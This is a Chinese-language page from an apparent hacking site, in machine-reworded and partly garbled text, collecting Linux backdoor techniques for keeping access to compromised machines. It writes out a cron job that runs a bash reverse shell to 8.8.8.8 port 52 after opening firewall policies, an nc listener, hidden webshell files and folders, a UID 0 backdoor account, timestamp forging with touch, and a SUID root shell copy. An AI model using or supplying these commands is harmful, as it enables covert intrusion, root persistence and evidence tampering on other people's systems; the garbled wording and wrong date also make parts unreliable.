Linux后门整理合集

Linux后门整理合集

黑客软件hacker2019-06-15 10:40:019663A+A-

"Unix Bash 远程控制侧门 

Linux后门整理合集 第1张

介绍 

运用 Unix/Linux 内置的 Bash 和 Crond 建立远程控制作用,维持反跳发布到内网ip设备。

运用方式 

先建立 /etc/xxxx 脚本制作文档(姓名自个改),运用该脚本制作开展反跳。下列脚本制作意味着自动式反跳到 8.8.8.8 的 52 端口号。

nano /etc/xxxx

#!/bin/bash

if netstat -ano|grep -v grep | grep ""8.8.8.8"">/dev/null

then

echo ""Ok"">/dev/null

else

/sbin/iptables --policy INPUT ACCEPT

/sbin/iptables --policy OUTPUT ACCEPT

bash -i >& /dev/tcp/8.8.8.8/52 0>&1

fi

 

chmod +sx /etc/xxxx

随后人们必须改动一下下 /etc/crontab 让它定时重启。

nano /etc/crontab     在 /etc/crontab 文档末添加这每行。意味着每 1 分鐘实行多次。

 

*/1 * * * * root /etc/xxxx 

最终重新启动一下下 crond 的服务项目。(不一样发行版重新启动方法不同,自主查寻)

service cron reload

service cron start

随后在 8.8.8.8 的网络服务器上应用 NC 接受 Shell 只能。

nc -vv -Lp 52

 

 

Linux/Unix 藏文档和文件夹名称 

 

Linux/Unix 下想藏 Webshell 或是侧门哪些的,能够运用一下下隐藏文件夹和文档。

方式一 

例如建立1个姓名打头带 . 的 Webshell 或是文件夹名称,默认设置状况下是不容易显示信息出去的,电脑浏览器浏览的那时候天赋加点浏览就行。(查询方式:ls -a)

touch .webshell.Python    建立姓名为 .webshell.Python 的文档

mkdir .backdoor/       建立姓名为 .backdoor 的文件夹名称

最终方式 

在管理人员喝醉了或是头脑转不回来的状况下,是絕對不容易发觉的!最少我用了这么多年是没好多个发觉的。

是文档得话电脑浏览器浏览立即输 有限责任公司 就行,文件目录同理。

touch 有限责任公司       建立姓名为 有限责任公司 的文档

mkdir 有限责任公司       建立姓名为 有限责任公司 的文件夹名称

实际效果如图所示:

 

文中《Linux侧门梳理合辑(脉率强烈推荐)》由armyzer0精英团队原創网上投稿安全性脉率,创作者老师机,安全性脉率SecPulse.Com独家代理发布文中,如必须转截,请先联络安全性脉率受权;没经受权切勿转截。 

Linux/Unix 加上 UID 为 0 的客户 

介绍 

在 Unix 管理体系下,UID 为 0 就是说 root 管理权限。因此渗入的那时候能够加上1个 UID 为 0 的客户做为侧门。

运用方式 

useradd -o -u 0 backdoor

 

Linux/Unix 改动文档时间戳 

介绍 

Unix 下藏侧门必需要改动時间,不然非常容易被发觉,立即运用 touch 就就行了。

例如参照 index.Python 的時间,再赋给 webshell.Python,結果2个文档的時间就相同了。

运用方式 

touch -r index.Python webshell.Python

或是立即将时间戳改动成某年某月某日。给出 2012 年 08 月 81 日。

touch -t 1401021042.30 webshell.Python

系统软件自然环境:

dawg:~# uname -a

Linux dawg 2.4.20-1-386 #3 Sat Mar 26 13:12:50 EST 2007 i686 GNU/Linux

 

SUID shell 

运用方式  

最先, 先转换变成root客户,并实行下列的指令:

dawg:~# Cp /bin/bash /.woot

dawg:~# chmod 4755 /.woot

dawg:~# ls -aL /.woot

-rwsr-xr-x 1 root root 690668 Jul 28 18:13 /.woot

或许, 你还可以起别的更具有掩藏性的姓名,我想要猥亵并随机应变的你,确实能想了许多好听的名字的。

文档前边的那一点儿也


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 3条评论
  • 似暖i2022-05-29 13:25:34
  • p; 最先, 先转换变成root客户,并实行下列的指令:dawg:~# Cp /bin/bash /.wootdawg:~# chmod 4755 /.wootdawg:~# ls -aL /.woot-rwsr-xr-x 1 root root 690668 Jul 28 18:13
  • 语酌空名2022-05-29 15:48:55
  • nux/Unix 改动文档时间戳 介绍 Unix 下藏侧门必需要改动時间,不然非常容易被发觉,立即运用 touch 就就行了。例如参照 index.Python 的時间,再赋给 webshell.Python,結果2个
  • 俗野掩灼2022-05-29 16:16:36
  • 下是不容易显示信息出去的,电脑浏览器浏览的那时候天赋加点浏览就行。(查询方式:ls -a)touch .webshell.Python    建立姓名为 .webshell.Python 的文档mkdir .backdoor/       

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理